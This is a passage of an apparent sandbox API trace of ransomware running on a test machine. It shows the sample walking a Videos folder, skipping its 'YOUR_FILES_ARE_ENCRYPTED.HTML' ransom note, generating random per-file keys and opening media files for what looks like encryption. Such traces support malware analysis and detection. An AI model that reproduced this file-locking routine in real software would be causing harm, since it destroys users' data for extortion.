lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b893f0, ftCreationTime.dwHighDateTime=0x1d7d90d, ftLastAccessTime.dwLowDateTime=0xbdf76930, ftLastAccessTime.dwHighDateTime=0x1d7e425, ftLastWriteTime.dwLowDateTime=0xbdf76930, ftLastWriteTime.dwHighDateTime=0x1d7e425, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0168.919] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6705a5a0, ftCreationTime.dwHighDateTime=0x1d7d8e6, ftLastAccessTime.dwLowDateTime=0xef9069e0, ftLastAccessTime.dwHighDateTime=0x1d7e193, ftLastWriteTime.dwLowDateTime=0xef9069e0, ftLastWriteTime.dwHighDateTime=0x1d7e193, nFileSizeHigh=0x0, nFileSizeLow=0xde24, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="DHGE9x qjE8n.mkv", cAlternateFileName="DHGE9X~1.MKV")) returned 1 [0168.919] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\DHGE9x qjE8n.mkv") returned 68 [0168.919] 
lstrcmpW (lpString1="DHGE9x qjE8n.mkv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.919] PathFindExtensionW (pszPath="DHGE9x qjE8n.mkv") returned=".mkv" [0168.919] lstrlenW (lpString=".mkv") returned 4 [0168.919] PathFindExtensionW (pszPath="DHGE9x qjE8n.mkv") returned=".mkv" [0168.919] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0879fe0, ftCreationTime.dwHighDateTime=0x1d7da33, ftLastAccessTime.dwLowDateTime=0x3cc08930, ftLastAccessTime.dwHighDateTime=0x1d7e224, ftLastWriteTime.dwLowDateTime=0x3cc08930, ftLastWriteTime.dwHighDateTime=0x1d7e224, nFileSizeHigh=0x0, nFileSizeLow=0xbb57, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="lVhqKKlYkclHgttF.flv", cAlternateFileName="LVHQKK~1.FLV")) returned 1 [0168.919] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\lVhqKKlYkclHgttF.flv") returned 72 [0168.919] lstrcmpW (lpString1="lVhqKKlYkclHgttF.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.919] PathFindExtensionW (pszPath="lVhqKKlYkclHgttF.flv") returned=".flv" [0168.919] lstrlenW (lpString=".flv") returned 4 [0168.919] PathFindExtensionW (pszPath="lVhqKKlYkclHgttF.flv") returned=".flv" [0168.920] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0168.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\lVhqKKlYkclHgttF.flv" (normalized: "c:\\users\\5alr3u30d3\\videos\\riupxrt01pzmn5 8ov6f\\lvhqkklykclhgttf.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5c0 [0168.920] GetFileSizeEx (in: hFile=0x5c0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=47959) returned 1 [0168.920] GetProcessHeap () 
returned 0x270000 [0168.920] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x77d1410 [0168.924] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="3B") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="1D") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="37") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="04") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="9E") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="06") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="56") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="97") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="7E") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="AE") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="76") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="8E") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="95") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="FC") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="10") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="13") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="9B") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="7B") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="1B") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="BD") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda86, 
param_2="%02X" | out: param_1="12") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="F6") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="97") returned 2 [0168.924] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="22") returned 2 [0168.925] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="91") returned 2 [0168.925] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="45") returned 2 [0168.925] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="94") returned 2 [0168.925] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="E6") returned 2 [0168.925] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="7B") returned 2 [0168.925] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="FD") returned 2 [0168.925] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="AD") returned 2 [0168.925] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="1C") returned 2 [0168.925] lstrcpyW (in: lpString1=0x77e14c4, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\lVhqKKlYkclHgttF.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\lVhqKKlYkclHgttF.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\lVhqKKlYkclHgttF.flv" [0168.925] CreateIoCompletionPort (FileHandle=0x5c0, ExistingCompletionPort=0x3a0, CompletionKey=0x77d1410, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.925] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x77d1410, lpOverlapped=0x77d1410) returned 1 [0168.925] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66fddd50, ftCreationTime.dwHighDateTime=0x1d7e6a3, ftLastAccessTime.dwLowDateTime=0xb3eeaf80, ftLastAccessTime.dwHighDateTime=0x1d7e6cc, 
ftLastWriteTime.dwLowDateTime=0xb3eeaf80, ftLastWriteTime.dwHighDateTime=0x1d7e6cc, nFileSizeHigh=0x0, nFileSizeLow=0xf786, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="TYyY-0of37OCQ.mp4", cAlternateFileName="TYYY-0~1.MP4")) returned 1 [0168.925] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\TYyY-0of37OCQ.mp4") returned 69 [0168.925] lstrcmpW (lpString1="TYyY-0of37OCQ.mp4", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.925] PathFindExtensionW (pszPath="TYyY-0of37OCQ.mp4") returned=".mp4" [0168.926] lstrlenW (lpString=".mp4") returned 4 [0168.926] PathFindExtensionW (pszPath="TYyY-0of37OCQ.mp4") returned=".mp4" [0168.926] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0168.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\TYyY-0of37OCQ.mp4" (normalized: "c:\\users\\5alr3u30d3\\videos\\riupxrt01pzmn5 8ov6f\\tyyy-0of37ocq.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5bc [0168.926] GetFileSizeEx (in: hFile=0x5bc, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=63366) returned 1 [0168.926] GetProcessHeap () returned 0x270000 [0168.926] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x77f9568 [0168.930] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="AA") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="94") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="E9") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="C7") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="AD") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda4a, 
param_2="%02X" | out: param_1="2B") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="D8") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="6F") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="B6") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="2D") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="CD") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="5E") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="43") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="0E") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="55") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="63") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="34") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="9A") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="FD") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="03") returned 2 [0168.930] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="15") returned 2 [0168.931] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="AE") returned 2 [0168.931] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="70") returned 2 [0168.931] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="22") returned 2 [0168.931] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="2D") returned 2 [0168.931] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="27") returned 2 [0168.931] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="E7") returned 2 [0168.931] wsprintfW 
(in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="AF") returned 2 [0168.931] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="32") returned 2 [0168.931] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="89") returned 2 [0168.931] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="5D") returned 2 [0168.931] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="68") returned 2 [0168.931] lstrcpyW (in: lpString1=0x780961c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\TYyY-0of37OCQ.mp4" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\TYyY-0of37OCQ.mp4") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\TYyY-0of37OCQ.mp4" [0168.931] CreateIoCompletionPort (FileHandle=0x5bc, ExistingCompletionPort=0x3a0, CompletionKey=0x77f9568, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.932] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x77f9568, lpOverlapped=0x77f9568) returned 1 [0168.932] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdcc98c0, ftCreationTime.dwHighDateTime=0x1d7d829, ftLastAccessTime.dwLowDateTime=0xd4d80cf0, ftLastAccessTime.dwHighDateTime=0x1d7d957, ftLastWriteTime.dwLowDateTime=0xd4d80cf0, ftLastWriteTime.dwHighDateTime=0x1d7d957, nFileSizeHigh=0x0, nFileSizeLow=0xdbb8, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="vU_u1zc3_cCZF.swf", cAlternateFileName="VU_U1Z~1.SWF")) returned 1 [0168.932] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\vU_u1zc3_cCZF.swf") returned 69 [0168.932] lstrcmpW (lpString1="vU_u1zc3_cCZF.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.932] PathFindExtensionW (pszPath="vU_u1zc3_cCZF.swf") returned=".swf" 
[0168.932] lstrlenW (lpString=".swf") returned 4 [0168.932] PathFindExtensionW (pszPath="vU_u1zc3_cCZF.swf") returned=".swf" [0168.932] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad52f430, ftCreationTime.dwHighDateTime=0x1d7e3f0, ftLastAccessTime.dwLowDateTime=0xe7a72140, ftLastAccessTime.dwHighDateTime=0x1d7e49c, ftLastWriteTime.dwLowDateTime=0xe7a72140, ftLastWriteTime.dwHighDateTime=0x1d7e49c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="Wxr2rtTDs HM", cAlternateFileName="WXR2RT~1")) returned 1 [0168.932] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM") returned 65 [0168.932] GetProcessHeap () returned 0x270000 [0168.932] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x749a470 [0168.932] lstrcpyW (in: lpString1=0x749a470, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM" [0168.932] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\*" [0168.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad52f430, ftCreationTime.dwHighDateTime=0x1d7e3f0, ftLastAccessTime.dwLowDateTime=0xe7a72140, ftLastAccessTime.dwHighDateTime=0x1d7e49c, 
ftLastWriteTime.dwLowDateTime=0xe7a72140, ftLastWriteTime.dwHighDateTime=0x1d7e49c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x12341d5, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0168.932] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad52f430, ftCreationTime.dwHighDateTime=0x1d7e3f0, ftLastAccessTime.dwLowDateTime=0xe7a72140, ftLastAccessTime.dwHighDateTime=0x1d7e49c, ftLastWriteTime.dwLowDateTime=0xe7a72140, ftLastWriteTime.dwHighDateTime=0x1d7e49c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x12341d5, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.932] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff4dc8c0, ftCreationTime.dwHighDateTime=0x1d7d78c, ftLastAccessTime.dwLowDateTime=0xf5f30670, ftLastAccessTime.dwHighDateTime=0x1d7d87f, ftLastWriteTime.dwLowDateTime=0xf5f30670, ftLastWriteTime.dwHighDateTime=0x1d7d87f, nFileSizeHigh=0x0, nFileSizeLow=0x1344f, dwReserved0=0x12341d5, dwReserved1=0x0, cFileName="GE0jLnj.avi", cAlternateFileName="")) returned 1 [0168.932] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\GE0jLnj.avi") returned 77 [0168.932] lstrcmpW (lpString1="GE0jLnj.avi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.932] PathFindExtensionW (pszPath="GE0jLnj.avi") returned=".avi" [0168.932] lstrlenW (lpString=".avi") returned 4 [0168.932] PathFindExtensionW (pszPath="GE0jLnj.avi") returned=".avi" [0168.933] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.933] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\GE0jLnj.avi" 
(normalized: "c:\\users\\5alr3u30d3\\videos\\riupxrt01pzmn5 8ov6f\\wxr2rttds hm\\ge0jlnj.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e8 [0168.933] GetFileSizeEx (in: hFile=0x5e8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=78927) returned 1 [0168.933] GetProcessHeap () returned 0x270000 [0168.933] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x78216c0 [0168.937] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="1F") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="E1") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="66") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="D1") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="44") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="3C") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="A1") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="98") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="6B") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="0B") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="45") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="8C") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="B5") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="94") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="8F") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="B5") returned 2 [0168.937] 
wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="54") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="F1") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="6E") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="18") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="10") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="F4") returned 2 [0168.937] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="65") returned 2 [0168.938] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="C8") returned 2 [0168.938] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="BC") returned 2 [0168.938] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="CB") returned 2 [0168.938] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="EB") returned 2 [0168.938] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="00") returned 2 [0168.938] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="41") returned 2 [0168.938] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="DD") returned 2 [0168.938] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="07") returned 2 [0168.938] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="2F") returned 2 [0168.938] lstrcpyW (in: lpString1=0x7831774, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\GE0jLnj.avi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\GE0jLnj.avi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\GE0jLnj.avi" [0168.938] CreateIoCompletionPort (FileHandle=0x5e8, ExistingCompletionPort=0x3a0, CompletionKey=0x78216c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.938] PostQueuedCompletionStatus 
(CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x78216c0, lpOverlapped=0x78216c0) returned 1 [0168.938] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8ea5740, ftCreationTime.dwHighDateTime=0x1d7d79e, ftLastAccessTime.dwLowDateTime=0xcb3fbea0, ftLastAccessTime.dwHighDateTime=0x1d7e25c, ftLastWriteTime.dwLowDateTime=0xcb3fbea0, ftLastWriteTime.dwHighDateTime=0x1d7e25c, nFileSizeHigh=0x0, nFileSizeLow=0x398b, dwReserved0=0x12341d5, dwReserved1=0x0, cFileName="kTlgx2Q.mp4", cAlternateFileName="")) returned 1 [0168.938] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\kTlgx2Q.mp4") returned 77 [0168.938] lstrcmpW (lpString1="kTlgx2Q.mp4", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.939] PathFindExtensionW (pszPath="kTlgx2Q.mp4") returned=".mp4" [0168.939] lstrlenW (lpString=".mp4") returned 4 [0168.939] PathFindExtensionW (pszPath="kTlgx2Q.mp4") returned=".mp4" [0168.939] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.939] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\kTlgx2Q.mp4" (normalized: "c:\\users\\5alr3u30d3\\videos\\riupxrt01pzmn5 8ov6f\\wxr2rttds hm\\ktlgx2q.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ec [0168.939] GetFileSizeEx (in: hFile=0x5ec, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=14731) returned 1 [0168.939] GetProcessHeap () returned 0x270000 [0168.939] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7849818 [0168.943] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="73") returned 2 [0168.943] wsprintfW 
(in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="39") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="E3") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="96") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="11") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="B1") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="9A") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="72") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="91") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="E6") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="57") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="80") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="01") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="EE") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="BD") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="E8") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="9A") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="91") returned 2 [0168.943] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="A1") returned 2 [0168.943] wsprintfW 